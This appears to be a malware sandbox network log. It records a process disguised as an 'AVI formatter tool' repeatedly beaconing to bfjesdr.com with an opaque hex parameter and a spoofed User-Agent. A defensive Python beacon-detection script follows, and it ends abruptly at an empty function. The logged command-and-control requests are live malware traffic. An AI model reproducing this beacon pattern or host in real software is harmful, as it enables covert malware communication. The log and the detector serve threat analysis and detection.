Jan 13, 2024 06:32:54.247020006 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:54.473670959 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:32:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:32:54.775568962 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:54.992610931 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:32:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:55.106118917 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:55.331656933 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:32:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:32:55.636356115 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:55.852837086 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:55.962891102 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:56.184292078 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:56.291934967 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:56.509675980 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:56.619421959 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:56.836061001 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:56.947837114 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:57.171179056 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:32:57.480485916 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:57.697202921 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:57.807179928 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:58.023518085 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:58.135067940 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:58.361965895 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:32:58.666810989 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:58.883490086 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:58.994115114 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:59.215150118 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49744 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:32:59.524748087 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:32:59.741477966 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:32:59.853621006 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:00.070429087 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:32:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:00.182375908 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:00.406045914 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49745 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:00.712280035 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:00.928683996 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:01.041418076 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:01.263536930 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49746 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:01.574083090 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:01.791479111 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49747 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:02.104852915 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:02.326613903 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49748 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:02.636725903 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:02.853491068 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49749 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:03.182521105 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:03.405860901 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49750 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:03.712527990 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:03.931130886 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Jan 13, 2024 06:33:04.041182995 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:04.266657114 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49751 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:04.574387074 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
    Host: bfjesdr.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:04.808871984 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 13 Jan 2024 05:33:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
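
The sessions listed above repeat one request to bfjesdr.com at a near-fixed cadence, always with the same opaque hex value in q= and a User-Agent that claims "Windows NT 9.0", a version that never shipped; every reply is the same 14-byte chunked body. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that runs a beacon check over those request lines and decodes the chunked body from the "Data Raw" bytes. The request line, User-Agent, timestamps and raw response bytes are copied from the session tables above; the table of known NT versions and the cadence threshold are assumptions chosen for illustration.

```python
"""Beacon check over the HTTP sessions listed in this report.

Added example, not part of the Joe Sandbox report or the sample.  Request
line, User-Agent, timestamps and the chunked response bytes are copied
from the session tables above; KNOWN_NT_VERSIONS and CADENCE_CV_MAX are
assumptions chosen for illustration.
"""
import re
import statistics
from urllib.parse import parse_qs, urlparse

# Constructed from the report: every OUT request carries this exact line.
REQUEST_LINE = (
    "GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e9"
    "92874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc9"
    "2be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1"
)
USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
# Timestamps of the OUT requests in the sessions above, in report order.
REQUEST_TIMESTAMPS = [
    "Jan 13, 2024 06:33:00.182375908 CET",
    "Jan 13, 2024 06:33:00.712280035 CET",
    "Jan 13, 2024 06:33:01.041418076 CET",
    "Jan 13, 2024 06:33:01.574083090 CET",
    "Jan 13, 2024 06:33:02.104852915 CET",
    "Jan 13, 2024 06:33:02.636725903 CET",
    "Jan 13, 2024 06:33:03.182521105 CET",
    "Jan 13, 2024 06:33:03.712527990 CET",
    "Jan 13, 2024 06:33:04.041182995 CET",
    "Jan 13, 2024 06:33:04.574387074 CET",
]
REQUESTS = [(ts, REQUEST_LINE) for ts in REQUEST_TIMESTAMPS]
# "Data Raw" of every 200 OK response in the report, verbatim.
RESPONSE_RAW = "65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a"

# Assumption: NT versions a genuine Windows browser can report (XP through 10/11).
KNOWN_NT_VERSIONS = {"5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
CADENCE_CV_MAX = 0.5  # assumption: gap variation below this looks like a timer, not a person


def ts_to_seconds(ts: str) -> float:
    """Seconds since midnight.  The report's 9-digit fractions exceed strptime's %f."""
    h, m, s, frac = re.search(r"(\d{2}):(\d{2}):(\d{2})\.(\d+)", ts).groups()
    return int(h) * 3600 + int(m) * 60 + int(s) + int(frac) / 10 ** len(frac)


def decode_chunked(raw_hex: str) -> bytes:
    """Reassemble a chunked body from the report's 'Data Raw' hex dump.

    The report's 'Data Ascii' only drops the CRLFs, so its leading 'e'
    (chunk size 14) and trailing '0' (last chunk) are framing, not payload.
    """
    data = bytes.fromhex(raw_hex.replace(" ", ""))
    body, pos = b"", 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)  # chunk-size [; extension]
        if size == 0:
            return body
        body += data[end + 2:end + 2 + size]
        pos = end + 2 + size + 2  # step over the chunk data and its CRLF


def ua_findings(ua: str) -> list:
    """Flag a User-Agent that claims a Windows NT version that never shipped."""
    m = re.search(r"Windows NT (\d+\.\d+)", ua)
    if m and m.group(1) not in KNOWN_NT_VERSIONS:
        return [f"User-Agent claims non-existent 'Windows NT {m.group(1)}'"]
    return []


def analyse(requests: list, ua: str) -> dict:
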